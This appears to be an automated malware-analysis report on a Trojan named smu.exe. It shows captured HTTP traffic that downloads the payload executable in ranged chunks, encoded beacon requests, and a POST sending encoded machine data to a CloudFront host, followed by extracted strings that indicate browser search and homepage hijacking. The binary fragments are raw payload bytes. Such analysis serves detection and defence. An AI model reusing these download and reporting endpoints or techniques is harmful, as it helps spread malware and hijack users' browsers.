. 2`...!...rTH.K.ZN.?3@.......1.;..i[.1.!.'=.....q..Xz.iQ.U>.....cT
r...dz...8..PK.....9.`....Qug=.0P3.~..ksUg0.....S_m..>..6q0}.b..@&l
t;-U....{..m<........X]|..n..&.....z.~..kE..9Yy...N..)h...{...&
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=3250000-3359007
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 109008
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:09 GMT
Content-Range: bytes 3250000-3359007/3359008
X-Cache: Miss from cloudfront
Via: 1.1 7922e01ab53e8f36477272573223ab35.cloudfront.net (CloudFront)
X-Amz-Cf-Id: I31ccdgXE3qawaG5WkECGySddehcAOPF3r7sbp2_0ec9HAyJnKf0nA==
~....wR0sx.D..iw..z-..g.....%/....U|..s....xN.hD.'E....DvG....'O..m..b
I%.m..... e$ozE.\..........&.....J...M....6....."...U...v...z8v.3..N..
..\..isE..9...Q........'..o1"..-?..Uj....9..K.@:............z6:.[: n..
.%...i..U..-..x..........u...3.T.u<..k......a..q...A.=[..@?*r......
...K'.9.g..GU..5.}tSH.......\.......|..!r.L........?.o....k...e.4...AF
h..l"=......S..f:, 7...>z,...6..C..,.XD.`...2....x49gD.=......KU..u
..v../...'...D?.....w.4...U.Nz.$.....v..@K.......".g...&.....wCP=.W.6z
.[.........8AM...O.'...E. ..@.F.7W&.I`...J..&(.*}a.X.-..G6.c^....m...T
W).=Qf..[....X!.nn.......X......l.....D...{q...%!,.....).L:E..b^.b.5..
..A...qU... k.....A..A..%.i...x..'........Wm.....=-.?..2s......1g&].Z.
n...T.q...z.[....C...SUQ...\..?....%D.........-./d.(.....;...2........
..x.%/..ECi%.:...4.T},1rf....... {O.B.<..... ]}.....Z...."...=....&
gt;.^.`u...g....}..].w....U.M......C.iH....~ .VQ.g#.15.Cg....G.k...|.
C..H$.)..a...V)...*....X75NiO... ...H]....;....8...@L>....O... 1M..
...............yhG..F..=}.....1....W...A1..\.J ...x..O..(. .....'..t..
B2.m>gKp`.N`..F/..CrB8.E.^.;..h!.9.O.....m..,n..;'P..v..U...ww.R...
.$^iG...]E...ZF7A..h)'.j...lr.@.R....B).....|....V.J.,.H...4.X.ks.....
e.N.[......IQ.@...)...w...4.W........".e.].....8........t..#..........
giJeZ.......E..Ow..k...X......^G#b.=.w..x.2.t..................x.oKM..
d....K..UJb~...X.y..]....u.. ....V6..8.(7.........<....S......P!.A.
;.Jk......Dl^3...3.......S.v.o)j...........9...Ja\.'W.8...;#..]R...V.3
.vz..M)G.?.....X...r4........_.....5.B.B.._I.d.{..rJ ~.T...\.o....
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=500000-749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:03 GMT
Content-Range: bytes 500000-749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 73bYzrGAQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:03 GMT..Content-Range: bytes 50000
0-749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c41295
fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: 73bYzrG
AQNmnG1baOMtjc5-dfLee3rDLMHTGLcQTJSulzOA0hZRqNA==..G|....F...`#1.G....
.....Wk*..<......3~m._..y3.....t..=is..h._m.M8T.i.K.._u..k.........
AJ.v&-2H.......i..K......-.S.2G...-q..}..])f....ad.j..f..EV.G.}g.NVBSR
!~Ne3..."4........V...{g..i .k.....$v..z:..K......X..;.j(..e.3....p...
c).............qW}i.-....z!.S...]....a.=g_.n....yx.n.y|.a.....\.uy....
....5.~.9I"E..V..R.3XX.[..W.<.XfGK.....`Q.q..|..?.G..........7..M..
.U.-....YzK!....D'.*>...o.~G.b....j...X.=S. .l\v.A..P..}.....h.d.g|
..D:...L.ky...k..jL..o.(.e$|R..[.Y.....|...6*..;3.o...w.i...x%..(]D!n.
..).bK.........<.! ..@.>.-SU.R/p."..M....o_.i.u... d..{M]...,5j.
<.'........O..L5.l.. S..G.0KD.q.B..^...Vk...}~...*C..^.q... .!....*
0.._...f..j.?.....~ .m..(..]L.kK.......`..h..... ..{......`.jR...$..LI
.,.W...;.mp~2.3.[8mI...f..............K..B..y.?.yk...Mc..J..wX..;.f...
V0.n..T$~...d..f3..;...X......t...=.......W.Q.._../5.)..lF "../.e..=.F
.0...C..... A.*u......hP.o.v.8.........9%....!..0J..ipJb|..e...I..,..N
..9K..c...Sn......\4WA.k.#.....t. 1.}.H.......>.......?.{......
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=1000000-1249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:06 GMT
Content-Range: bytes 1000000-1249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: GOtOcUaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:06 GMT..Content-Range: bytes 10000
00-1249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412
95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: GOtOc
UaeRubNkdJJcxbDp34Q7UvWRt24FjfdWQixZSboFzckdf8XyA==.....@.eU...N.wz.F.
.........'..0.{.)U~...N.:?....T.t........SG'/.<..m....:.K...._.....
...\...C.v%.............d..xkD..p8%..].Q.....9.....N\&h.D.q.....u.K.p.
.C..]DsO.....DnP|.?.o.%.........5k..M...9......E.,.6,p.5..W.....i.t...
.HcH..?...6..jR.\....Od.....[...Jg..!....;....F....)~..........W......
*.;.t.....X7...a. :.uw/.S.E....c...`.jj._....D..x..93.....j.......?.V.
....C.=N...v......./....[..zN....g.].4G?y'^q..,.w...).z1...u..,[n?..p.
f..k.....3CE..^.....6.........t.%e......Q]!.#.J.6.(..N..X.#.2W.u#..Tvi
......LA.F...hb...w%..dC.92..9a....~Y...*1.5jM....ZoS........dR....1&-
..~Cy.....^X.<ih..O>..4.......Y.P....L#...~......o.~..4k=..&G.G.
..[. F.... .w./..........^e.oW.Y)....:'.....c......lb.TN.....[.h......
S...x.6..(Ijbj...|F..K.......$e.j.z..4.5.H..........k.J...8q..#....Y93
g.......5TQ..8.$..:.P.k....H.i).9.S..U.H........CsCQd.9f...........<
;...MW.(_.......{.k..i..1`..Mx_&.v.y>l^r.H.......o. .&;;.W..F...6..
.1..^.=F..W..=.\.?l..^....4...j....D..'...8]..%Y`....L6...c..U?..H
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2000000-2249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2000000-2249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: In5ZPfnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 20000
00-2249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412
95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: In5ZP
fnrz4RStEHUJKJFc_bd7MY7cv54AbD8JuHhDS8qw4BcFn41mQ==....M..HUn.W..=....
Sa..s..Mh.^.B,=..._V.e3F..;...Y.1.r..A.&gS3.....;.l...L........_.....4
..0L77.7,O..(j..~.# ..H{ ..zXg.k......=..5f|.*2./.ie...>..pQD 'A...
...\e..ME.....2....gm.lu....!..9`....{...2IY.^.n.x..$...xl.....0..r...
y[.7B..`..j...PO..?...L...h..........r...........L.ad....uv..X.}......
."...x?...w;....M.M.Vb.....0q.}gUA...G.>..%L.~.....k.!.....i:.5....
...?...1......1......NI..N.....R..<....uv....U.s.B.(.P..pL.s.."..8.
......4&.......[o.bpoJ.."M.b1...'"J.:.(.;->.....&_..E...#....L.Z...
.w.........c".....:..oT.....<....N.!.N...u..c......;.|.C.......A..\
.._ -X....Z...........UDC.1.D".TZ.e5.q.5..x....k>.jDu.hk..Y.@......
?.i....Fp@.>e...N..:O...15Y9.....}.uTa%...N2.>9...[.&S.fc^.."@..
...]s<...~.O.Cn5.'^...e...v.......b...m<...........ww._.p.u.e.61
.gn ...$b"..o.....^.4#]...........t../.xi.../l@C}.I.V...G..FB.e.....3Y
.O...^y..*U..^G9..........M....T....W.L.Wn.t.~A.H9G...x..CW.M...n:...f
....4....~.;a........,.2....z... ...@D...F...M.*....MM.?..R.....k.
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=2500000-2749999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:07 GMT
Content-Range: bytes 2500000-2749999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: UJBgyu-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:07 GMT..Content-Range: bytes 25000
00-2749999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412
95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: UJBgy
u-grWH9iJrDK9N1Fi5GMnW6lToTKqBVlqBOJkPDl2iaqxci9g==....vH..r...<..X
QR.N.....O3.h.&....nS.:MT.b.$...k.!.i...%.6#...._.7".A:...?...c.N.D...
.;.7..N..`..{....kc.E....f..X.i....@.F...w".....4...../.&H.N..B...*...
'..i...t...{...n@=#j..y.-...-..................JCpNR..8^|..%.]0..?...p
g..b.S.=...2..8......)#..v....r.b^Ow.l....St.Kc..Q..p'....=0Up4_..D..y
d..Q.......a...4.4.Q.):...~b..\x.e..M..y 9.30.....`4Z..g....C..*....f.
..(v_)a.5[..>...m....p.x..d#.4.Z.Cr..@.*S._.$....v...a..B...XC.)g.7
..........%k..IX.?..J`..>.c..........z.....R..3 ...0^....BL..{.;...
..... 0cc...zR.pL....-.. ..M..8....(&...So..!..R..[.........^.........
.~.e..Z.....|[:.....%<t........k6.X~2..q?aH. ../..(.).8.._..a..:e..
.T7..A.U.....l..........q.."B..e.k.!%Gw..............W..K.T...7e...T..
.U..6.....].so.&.^.......M.E..U.....72\-.\d$wd.........4..B^.....>#
Zx....Y.o.2N.D.dB_.e4.Q..Y...68..*..g.0.....a...Q.k.06...j.x19' @.O>
;.'..Y.i]@...U.....dG[.p%.O............c..j..H......Y*.#.N..V.......
6...d.9r.........>mg.....^.@..e...4.PY.3....<.....Jz..s.LS.m
<<< skipped >>>
GET /smw121634dp.exe HTTP/1.1
Range: bytes=3000000-3249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d13s98z2lzti92.cloudfront.net
Connection: Keep-Alive
HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
Cache-Control: private
Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT
Accept-Ranges: bytes
ETag: "44deb3125cb9d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:08 GMT
Content-Range: bytes 3000000-3249999/3359008
X-Cache: Miss from cloudfront
Via: 1.1 1f8a17c41295fac39556a328869a62bd.cloudfront.net (CloudFront)
X-Amz-Cf-Id: HYkReG18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==
HTTP/1.1 206 Partial Content..Content-Type: application/octet-stream..
Content-Length: 250000..Connection: keep-alive..Cache-Control: private
..Last-Modified: Wed, 08 Jul 2015 08:57:09 GMT..Accept-Ranges: bytes..
ETag: "44deb3125cb9d01:0"..Server: Microsoft-IIS/7.5..X-Powered-By: AS
P.NET..Date: Mon, 20 Mar 2017 00:20:08 GMT..Content-Range: bytes 30000
00-3249999/3359008..X-Cache: Miss from cloudfront..Via: 1.1 1f8a17c412
95fac39556a328869a62bd.cloudfront.net (CloudFront)..X-Amz-Cf-Id: HYkRe
G18M0uc9GlZ8mnOOUb0KoWlETc6mEBYP88wmo9j6kPC8AKe5Q==.._0Z...g..R~*. ...
.t.......Q!."C..*....p....I...@_.X..-.9...o.......b....|.......#u.E...
..c.c.......G..{.m.7 .9N...z.R.h.....O.=..L7-..C.Yj....oo..z!. |A...p:
...U.I..R?-....*>....5{.......2X.II....(L[.a....p.1.^5;G$.O".'8 ..
|...\.(..M....SW..%.y.......A$...*...6...H.:R......).2.M-..}.kZ...M..v
.;e......V=-.0.i.,.Z>..M-A..!........z.R...K..:.v.%.fh.....)...o..e
`...Xi..t....6^.Hei*y..D5.C.^..$yr.J!]B@.Wdf....w4v.P.T...7_....C.I!&.
y... ...p...P..d...|....&........a..:G.k.`0....?..5...V@.G...2..w..2so
v..}..'...Uk.<02.r...[...=.(Z..s..5....7e._...@.V.T?G...? V..}~y...
.'{.y.1..hj....g.I.......o.c...@..W.H...%'...#L..l.f_oN..;.&.?D.c[..*&
gt; &..t..q....RU1.gn...5.Yn.1...R..;'..."..i..=.9....&..0..;.d..w).Y2
>u..-ID....4..Br<..0...\z.D1......:..../..{..g...t..zt.7....;.'.
.k.q...._..O.\a:8..Xv.........U&...XgrX..t&Q...I @V.ed.RR.c0.).,......
..e)$vf..n..1.V..*...0.Q....(.F..,... t..........u}......0......7}>
..2.....3|[FE.C....."..0...l...Lv5..f..8u...D.....^.-a.....V...!..
<<< skipped >>>
GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYR6njPZcIS19LQZ0RbIZgn/G04r2GZQbxA4k4Gm5vvSsnGAt48jCvkuTKeC3EisBSuPQCW3Xc52o2/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdYzx82mF 8 w= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 27b3a801292660302bc6c8d6a96c71ce.cloudfront.net (CloudFront)
X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHwKTPgWNQH-dElrevhRthrbjMuiZTUQ==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 27b3a801292660302bc6c8d6a96c71
ce.cloudfront.net (CloudFront)..X-Amz-Cf-Id: IqKgcCHBKYBnbQOW_sqLgoSHw
KTPgWNQH-dElrevhRthrbjMuiZTUQ==..
GET /p.ashx?e=lOCrbsNL2zXY n Drgf83Ceu24nwBOho9kJpoiaoxYTLUfe2AWI4iW/NJcbq0HoEgctTzNTrZipoENv9hv yb1U5UwOzfEgnfa6VRey9pub6LKPMT5YRxqPDlT6qw/1mxko6F4tH/rEF31vgH 2Mri4btG OZIk/aFQl5nsf8/DcvKSgaF6RF7PiCC4paVhdKPgmwjXNu7I= HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: 5dGyfRyvNsaT36GyavkHw40BfuerDGzXL3efhPpd2OpD9RNXP77kuQ==
....
GET /p.ashx?e=bdqY0vC4PYtCQdt9doPgoA0rZFNspeHnFDDfVv/vH29/uaLevhL3VpGCCoDalgcEvSm4upuKAkb3HPmTAFrGinfglf7YsJYJYvL zeepkoH7lS9xrvVML BEf8zqYXvVBuc4HO5RaucB0eAPmqRh7cqZ27dtquSa6Yc5lgnLWj9NhpNg/N/OrsNgV0KIQ93 dulfay3 QHl32cx0G27ZSGAqR2XPWVGh9o0hxHg3iWEUAvnawhe3hRc0NdkJ4D18DFbcjOkM5Uo QFr7zZfYbQ== HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: d1y2jryd6u59ns.cloudfront.net
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:14 GMT
X-Cache: Miss from cloudfront
Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263c3.cloudfront.net (CloudFront)
X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQnzthqVVm6lg-bt7YByOUnE5sU4r-A==
HTTP/1.1 200 OK..Content-Length: 0..Connection: keep-alive..Cache-Cont
rol: private, no-store..Server: Microsoft-IIS/8.5..X-AspNet-Version: 4
.0.30319..X-Powered-By: ASP.NET..Date: Mon, 20 Mar 2017 00:20:14 GMT..
X-Cache: Miss from cloudfront..Via: 1.1 d6fa2e1de8f392301c10fd5bb7b263
c3.cloudfront.net (CloudFront)..X-Amz-Cf-Id: WIaVVq4FaajpOxw7kcMX8NRAQ
nzthqVVm6lg-bt7YByOUnE5sU4r-A==..
POST /br.ashx?pid={PID}&aid={AID}&ss=0&s=FAAzamodk0,99999999-9999-4180-88c6-7a076893e507,&v=2.3.12.1634&md5=8fabe64f8ec5d8b0b835e8a83f29082c&mid=AiAAAiAAA3A9AAA7A3AJieA1A91J7L773DiLAiiAA13D1J&uid=6F75218C-FEA5-4C12-BC59-BB31CD1E1E1A HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.0)
Host: d23ocewf5ttxmu.cloudfront.net
Content-Length: 2086
Connection: Keep-Alive
Cache-Control: no-cache
d=MtqTE47KGyjjA8zS3H7pJFOADWaZCWMCDWjQ0ujplOd9MbV/lVmWaND 60ePIdsrOcMBzS3H5a0be7N36qAF8kdvdSvmslRxPCNs1oS8WZUOzaar9Egy5SzOr9rhzlAQdf09Xr401steNr mQH VoxX6Rze/7NvJYTdPZS04 jvBMWqv6Qvf9DNZawo3yh8aLrtJikea7Vr6RYlRBKnKPhzN0jVqDPxXWcZpZKsofN7lBOl e1/lbjhigtcqjvKJ0HXl60Dt/azGf4WyQ4pBcaujTuYHUvmbfXoBUdDBpfst5Cnu/6UfyPOPBhh4PvLgPcCVrzCocS421e/NCDWm6mw3fw1TVhnvONcolvvTJMhYKAbBQ6MCy/YiDfDObVBWQ6lOY3KgH2A7Ok2sevxNYKZBkH1lwef5iVaJzvCTQFDpqXuumXfvxH80JeF3wmqbFDzGhyy5ZVQY/zgXrmxAdSaCYQnjsEpKqNUiWYmuW54ILS5IZNtenyQHPVyolqBCD/5l0Jp/pGw/wdklma XkH/sMYQW/q6APL9AZS6vInj5q402KYmuO7uUVWQkNDrUzVQogiSiHUUbkt9xGmkZ3KbvoMG8r9VxUGu2nQcHLKpLbWdCZoCU6lTrA4SDxYt3XQUh14jtaQ6zaqej14QNUX9tuDXbGFU/4ilR5GOuvw37L WtwDUNySQevrJPNOODaBdBZnaFneyb3tAKPGOiQlcUlcnVIrWNWsGrgZefH875FB4dAsQ5PNnszPtZSAO/AudQs9axn3MjcyAgLnSpYGBy1utPgkEJWFebggy2cY1Sa9k zM04yMJWSpAMTxjmcpfDFzOuHVu dUt73kOcovtbTwO1fRDkEvb7nxvf6F9X4XhtGfA6F9un4Sj tycBIXzlj5AJYVGg9CeDOJiHVYEMD6f0Yxw9PvVvnPv67ClaftH4KT2nccqYvSDAOzz7tO5R OJbSC7H67zZblJzmrY3OfIBxIaolmlJImDSsXKAcuKKCKL0Y0Gf/sSMU6n3cHi5Y9Aw06mw26Anf1ZHGdeySNMAGf2g58F8QzEcR48L
HTTP/1.1 200 OK
Content-Length: 0
Connection: keep-alive
Cache-Control: private,no-cache, no-store
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 20 Mar 2017 00:20:18 GMT
X-Cache: Miss from cloudfront
Via: 1.1 69ae15d1338b64299d3942a44fc1fb96.cloudfront.net (CloudFront)
X-Amz-Cf-Id: y-P4GnL3XgWw958bmBsKHnH4bmjE4R0VQRvOHKvG4EUsEqr--HSwQg==
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
smu.exe_3356:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
D$@j.Xf
D$@j.Xf
<:>
<:>
t8Ht.HHt#
t8Ht.HHt#
F2t%f
F2t%f
#t.Ht
#t.Ht
2 34 567
2 34 567
j.Yf;
j.Yf;
_tcPVj@
_tcPVj@
.PjRW
.PjRW
broken pipe
broken pipe
inappropriate io control operation
inappropriate io control operation
not supported
not supported
operation in progress
operation in progress
operation not permitted
operation not permitted
operation not supported
operation not supported
operation would block
operation would block
protocol not supported
protocol not supported
function not supported
function not supported
operation canceled
operation canceled
address_family_not_supported
address_family_not_supported
operation_in_progress
operation_in_progress
operation_not_supported
operation_not_supported
protocol_not_supported
protocol_not_supported
operation_would_block
operation_would_block
address family not supported
address family not supported
0123456789-
0123456789-
%b %d %H : %M : %S %Y
%b %d %H : %M : %S %Y
%m / %d / %y
%m / %d / %y
%I : %M : %S %p
%I : %M : %S %p
%d / %m / %y
%d / %m / %y
operator
operator
GetProcessWindowStation
GetProcessWindowStation
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
1.2.3
1.2.3
SQLite format 3
SQLite format 3
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLY
CREATE TABLE sqlite_master(
CREATE TABLE sqlite_master(
sql text
sql text
3.7.2
3.7.2
CREATE TEMP TABLE sqlite_temp_master(
CREATE TEMP TABLE sqlite_temp_master(
208.69.150.250
208.69.150.250
208.69.150.252
208.69.150.252
8.8.8.8
8.8.8.8
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\
Catcher.ProcessId:
Catcher.ProcessId:
Catcher.Path:
Catcher.Path:
Watcher.Filter:
Watcher.Filter:
2.3.12.1634
2.3.12.1634
smu.exe
smu.exe
Chrome
Chrome
Report.xml
Report.xml
/Url:
/Url:
Report factory:
Report factory:
Update.xml
Update.xml
URLSet
URLSet
Report
Report
homeURL
homeURL
suggestURL
suggestURL
newTabURL
newTabURL
ieSearchURL
ieSearchURL
chSearchURL
chSearchURL
ffSearchURL
ffSearchURL
opSearchURL
opSearchURL
chromeKeyword
chromeKeyword
[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]
[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]
vup.tmp
vup.tmp
Argument.CheckResult:
Argument.CheckResult:
Argument.IsRunning:
Argument.IsRunning:
Delivery of report succeeded. TaskId:
Delivery of report succeeded. TaskId:
Delivery of report failed.
Delivery of report failed.
SHDeleteKeyW
SHDeleteKeyW
RegDeleteKeyExA
RegDeleteKeyExA
RegDeleteKeyExW
RegDeleteKeyExW
CCCzdef1,11111111-1111-1111-1111-111111111111
CCCzdef1,11111111-1111-1111-1111-111111111111
NtQueryKey
NtQueryKey
1.3.6.1.4.1.311.2.1.12
1.3.6.1.4.1.311.2.1.12
urls
urls
ERROR: %s
ERROR: %s
SELECT * FROM urls
SELECT * FROM urls
WebData path:
WebData path:
favicon_url
favicon_url
keyword
keyword
originating_url
originating_url
suggest_url
suggest_url
keywords
keywords
keyword LIKE '
